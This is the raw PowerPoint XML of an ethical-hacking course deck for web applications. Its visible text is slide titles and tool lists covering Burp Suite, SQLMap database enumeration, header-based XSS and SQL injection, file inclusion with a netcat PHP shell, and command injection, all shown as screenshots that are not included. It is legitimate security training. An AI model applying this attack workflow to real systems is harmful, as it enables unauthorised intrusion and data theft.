      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40225919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Info – SQL Injection Fuzzing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="userinfo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577" t="-33513" b="-57"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="645553" y="-597869"/>
            <a:ext cx="7852903" cy="6217392"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25357055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 Request To Repeater</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="userinfo2.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642" t="7966" b="14569"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="607061" y="1251522"/>
            <a:ext cx="7929878" cy="4123083"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13723550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For SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="userinfo3.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5548" b="807"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="760236" y="1143812"/>
            <a:ext cx="7623528" cy="4799692"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32617743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SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="userinfo4.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5131" b="16549"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="760236" y="1250713"/>
            <a:ext cx="7623528" cy="4014219"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16627620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SQL Injection In Browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="userinfo5.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t="-513"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1229338"/>
            <a:ext cx="7924800" cy="4292152"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15107114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Burp URL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="userinfo6.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10601" t="2312" r="20436" b="11445"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1172271" y="1181365"/>
            <a:ext cx="6799467" cy="4323849"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3285666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Workflows - Spider 	</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>wget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Cewl</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Manually browse the site in a browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Curl</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Wireshark</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use forced directory/file browsing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use ZAP to spider</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use Burp to spider</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9105295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Browser Results</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="userinfo7.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125" t="5604" b="27845"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="773065" y="1314850"/>
            <a:ext cx="7597870" cy="3271059"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34945524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p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="userinfo8.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5168" b="10664"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="760236" y="1218640"/>
            <a:ext cx="7623528" cy="4136928"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40471747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SQLMap</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="sqlmap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798" t="6168" b="13053"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="613480" y="1230807"/>
            <a:ext cx="7917049" cy="4123083"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19004251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Page Vulnerable</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="sqlmap2.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125" t="5386" b="15118"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="773065" y="1261399"/>
            <a:ext cx="7597870" cy="3907321"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40110826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 To </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SQLMapper</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="sqlmap3.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7634" b="16549"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="760236" y="1293468"/>
            <a:ext cx="7623528" cy="3885942"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1279954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SQLMapper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Setup</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="sqlmap4.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t="16630" b="16630"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1333500"/>
            <a:ext cx="7924800" cy="3429000"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2958399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 Enumeration Options</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="sqlmap5.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478" t="7425" b="9567"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="747407" y="1229329"/>
            <a:ext cx="7649186" cy="4254516"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15653412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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SQLMap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> In Terminal</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="sqlmap6.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644" t="6825" b="34421"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="92514" y="1443116"/>
            <a:ext cx="8958972" cy="2651054"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7355546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Databases &amp; Tables </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="sqlmap7.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478" t="6825" b="-843"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="747407" y="1333500"/>
            <a:ext cx="7649186" cy="3733436"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42258774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Narrow Down To One DB</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="sqlmap8.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8071" b="10255"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="760236" y="1240018"/>
            <a:ext cx="7623528" cy="4104859"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2491529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Workflows - Content</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Robots file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Inspect html markup</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Inspect CSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Inspect JS files</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9047645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Map Output</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="sqlmap9.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640" t="6824" b="-1650"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="753826" y="1333501"/>
            <a:ext cx="7636357" cy="3765504"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16420249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 To Accounts Table</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="sqlmap10.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125" t="7860" b="6852"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="773065" y="1229327"/>
            <a:ext cx="7597870" cy="4286584"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3786489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Dump – Don’t Do This</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="sqlmap1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478" t="6824" b="-2188"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="747407" y="1333502"/>
            <a:ext cx="7649186" cy="3786883"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30575878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 To Show DB Vulnerability</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="sqlmap12.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125" t="8285" b="7490"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="773065" y="1250706"/>
            <a:ext cx="7597870" cy="4233136"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1180904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Better Output As Proof</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="sqlmap13.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478" t="6824" b="-304"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="747407" y="1333500"/>
            <a:ext cx="7649186" cy="3712056"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12155240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SQLMap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Results</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="sqlmap14.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125" t="6824" b="6824"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="773065" y="1333500"/>
            <a:ext cx="7597870" cy="3429000"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39519899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Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Header - XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="referer_script.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8284" b="15887"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="760236" y="1293468"/>
            <a:ext cx="7623528" cy="3811113"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13861385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Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – Fix XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="referer_script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611" t="8710" b="17487"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="792309" y="1346918"/>
            <a:ext cx="7559382" cy="3709329"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35827849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Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="referer_script2.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802" t="7860" b="12169"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="760236" y="1293468"/>
            <a:ext cx="7623528" cy="4019341"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30048703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Agent Header - XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="UA.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954" t="7761" b="13868"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="619890" y="1252851"/>
            <a:ext cx="7904220" cy="4090349"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4172763082"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>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Horizon.thmx</Template>
  <TotalTime>88337</TotalTime>
  <Words>6559</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:10)</PresentationFormat>
  <Paragraphs>784</Paragraphs>
  <Slides>156</Slides>
  <Notes>146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156</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="160" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Arial Narrow</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Horizon</vt:lpstr>
      <vt:lpstr>Ethical hacking for Web and mobile applications</vt:lpstr>
      <vt:lpstr>Permission</vt:lpstr>
      <vt:lpstr>Scope </vt:lpstr>
      <vt:lpstr>Workflow</vt:lpstr>
      <vt:lpstr>Information Gathering</vt:lpstr>
      <vt:lpstr>Passive Tools</vt:lpstr>
      <vt:lpstr>Non Passive Tools</vt:lpstr>
      <vt:lpstr>Application Workflows - Spider  </vt:lpstr>
      <vt:lpstr>Application Workflows - Content</vt:lpstr>
      <vt:lpstr>Burp Suite</vt:lpstr>
      <vt:lpstr>Target Tab – Free Version</vt:lpstr>
      <vt:lpstr>Target Tab – Pro Version</vt:lpstr>
      <vt:lpstr>Scanner – Pro Version</vt:lpstr>
      <vt:lpstr>Proxy</vt:lpstr>
      <vt:lpstr>Repeater</vt:lpstr>
      <vt:lpstr>Intruder</vt:lpstr>
      <vt:lpstr>Intruder Fuzzing</vt:lpstr>
      <vt:lpstr>Extender</vt:lpstr>
      <vt:lpstr>Dojo-Basic</vt:lpstr>
      <vt:lpstr>Advanced attacks use similar workflows</vt:lpstr>
      <vt:lpstr>Configure Browser Proxy</vt:lpstr>
      <vt:lpstr>Configure FoxyProxy In Browser</vt:lpstr>
      <vt:lpstr>Open Web App</vt:lpstr>
      <vt:lpstr>Add To Scope</vt:lpstr>
      <vt:lpstr>Edit Scope</vt:lpstr>
      <vt:lpstr>View Source</vt:lpstr>
      <vt:lpstr>Manually Spider Application</vt:lpstr>
      <vt:lpstr>Automated Spider</vt:lpstr>
      <vt:lpstr>Site Map After Spider</vt:lpstr>
      <vt:lpstr>Force Directory/File Browse</vt:lpstr>
      <vt:lpstr>Site Map After Forced Directory Browse</vt:lpstr>
      <vt:lpstr>Robots File</vt:lpstr>
      <vt:lpstr>Robots File</vt:lpstr>
      <vt:lpstr>config.inc</vt:lpstr>
      <vt:lpstr>config.inc</vt:lpstr>
      <vt:lpstr>config.inc</vt:lpstr>
      <vt:lpstr>Myconfig - browser</vt:lpstr>
      <vt:lpstr>MyConfig.inc - Browser</vt:lpstr>
      <vt:lpstr>MyConfig.php - Browser</vt:lpstr>
      <vt:lpstr>MyConfig - Burp</vt:lpstr>
      <vt:lpstr>MyConfig.inc - Burp</vt:lpstr>
      <vt:lpstr>MyConfig.php - Burp</vt:lpstr>
      <vt:lpstr>Passwords</vt:lpstr>
      <vt:lpstr>Accounts.txt - Browser</vt:lpstr>
      <vt:lpstr>Accounts.txt - Burp</vt:lpstr>
      <vt:lpstr>Try Passwords - Ed</vt:lpstr>
      <vt:lpstr>Ed - Response</vt:lpstr>
      <vt:lpstr>HTTP History For Login</vt:lpstr>
      <vt:lpstr>Send To Repeater</vt:lpstr>
      <vt:lpstr>Validate Good Response</vt:lpstr>
      <vt:lpstr>Validate User John</vt:lpstr>
      <vt:lpstr>Validate User Adrian</vt:lpstr>
      <vt:lpstr>Validate User Admin</vt:lpstr>
      <vt:lpstr>Add to notes</vt:lpstr>
      <vt:lpstr>Notes - Spreadsheet</vt:lpstr>
      <vt:lpstr>URL Decode</vt:lpstr>
      <vt:lpstr>Base64 Decode</vt:lpstr>
      <vt:lpstr>Base64 Decoded Results</vt:lpstr>
      <vt:lpstr>Send To Intruder</vt:lpstr>
      <vt:lpstr>Intruder Target Tab</vt:lpstr>
      <vt:lpstr>Intruder Positions Tab</vt:lpstr>
      <vt:lpstr>Intruder Payload Tab</vt:lpstr>
      <vt:lpstr>Payload Setup Continued</vt:lpstr>
      <vt:lpstr>Intruder Options Tab</vt:lpstr>
      <vt:lpstr>Intruder Results</vt:lpstr>
      <vt:lpstr>Intercept</vt:lpstr>
      <vt:lpstr>Reload Current Page</vt:lpstr>
      <vt:lpstr>Modify UID</vt:lpstr>
      <vt:lpstr>Now Admin</vt:lpstr>
      <vt:lpstr>Register A New User</vt:lpstr>
      <vt:lpstr>SQL Error</vt:lpstr>
      <vt:lpstr>Fix MySQL Error</vt:lpstr>
      <vt:lpstr>XSS Vulnerability</vt:lpstr>
      <vt:lpstr>User Info – SQL Injection Fuzzing</vt:lpstr>
      <vt:lpstr>Send Request To Repeater</vt:lpstr>
      <vt:lpstr>Test For SQL Injection</vt:lpstr>
      <vt:lpstr>Manual SQL Injection</vt:lpstr>
      <vt:lpstr>View SQL Injection In Browser</vt:lpstr>
      <vt:lpstr>Copy Burp URL</vt:lpstr>
      <vt:lpstr>Browser Results</vt:lpstr>
      <vt:lpstr>Response</vt:lpstr>
      <vt:lpstr>SQLMap</vt:lpstr>
      <vt:lpstr>Login Page Vulnerable</vt:lpstr>
      <vt:lpstr>Send To SQLMapper</vt:lpstr>
      <vt:lpstr>SQLMapper Setup</vt:lpstr>
      <vt:lpstr>Edit Enumeration Options</vt:lpstr>
      <vt:lpstr>Run SQLMap In Terminal</vt:lpstr>
      <vt:lpstr>Databases &amp; Tables </vt:lpstr>
      <vt:lpstr>Narrow Down To One DB</vt:lpstr>
      <vt:lpstr>SQL Map Output</vt:lpstr>
      <vt:lpstr>Pin To Accounts Table</vt:lpstr>
      <vt:lpstr>User Dump – Don’t Do This</vt:lpstr>
      <vt:lpstr>Count To Show DB Vulnerability</vt:lpstr>
      <vt:lpstr>Better Output As Proof</vt:lpstr>
      <vt:lpstr>SQLMap Results</vt:lpstr>
      <vt:lpstr>Referer Header - XSS</vt:lpstr>
      <vt:lpstr>Referer – Fix XSS</vt:lpstr>
      <vt:lpstr>Referer – SQL Injection</vt:lpstr>
      <vt:lpstr>User Agent Header - XSS</vt:lpstr>
      <vt:lpstr>User Agent – Fix XSS</vt:lpstr>
      <vt:lpstr>User Agent – SQL Injection</vt:lpstr>
      <vt:lpstr>LFI - Browser</vt:lpstr>
      <vt:lpstr>LFI - Burp</vt:lpstr>
      <vt:lpstr>RFI</vt:lpstr>
      <vt:lpstr>RFI – Base Request</vt:lpstr>
      <vt:lpstr>PHP RFI id Code</vt:lpstr>
      <vt:lpstr>RFI – Localhost PHP id</vt:lpstr>
      <vt:lpstr>RFI – Google </vt:lpstr>
      <vt:lpstr>RFI –  Google</vt:lpstr>
      <vt:lpstr>Netcat PHP Shell Code</vt:lpstr>
      <vt:lpstr>RFI + Shell</vt:lpstr>
      <vt:lpstr>RFI Shell</vt:lpstr>
      <vt:lpstr>Command Injection</vt:lpstr>
      <vt:lpstr>Command Injection Base Request</vt:lpstr>
      <vt:lpstr>Command Injection – ls -al</vt:lpstr>
      <vt:lpstr>Command Injection – Env Vars</vt:lpstr>
      <vt:lpstr>Snake – Get Highscore</vt:lpstr>
      <vt:lpstr>Snake – Send POST To Repeater</vt:lpstr>
      <vt:lpstr>Repeater – Test 1</vt:lpstr>
      <vt:lpstr>Snake – Repeater Test 2</vt:lpstr>
      <vt:lpstr>Snake - Comparer</vt:lpstr>
      <vt:lpstr>Snake – Comparer - Word</vt:lpstr>
      <vt:lpstr>Intruder – Payload Positions</vt:lpstr>
      <vt:lpstr>Snake – Payload 1</vt:lpstr>
      <vt:lpstr>Snake – Payload 2</vt:lpstr>
      <vt:lpstr>Snake Intruder – Grep Match</vt:lpstr>
      <vt:lpstr>Snake Intruder - Results</vt:lpstr>
      <vt:lpstr>Snake Repeater – Add New High Score</vt:lpstr>
      <vt:lpstr>Validate New High Score</vt:lpstr>
      <vt:lpstr>Snake Intruder – Free Grep Selection</vt:lpstr>
      <vt:lpstr>Snake Intruder – Free – Grep Extract</vt:lpstr>
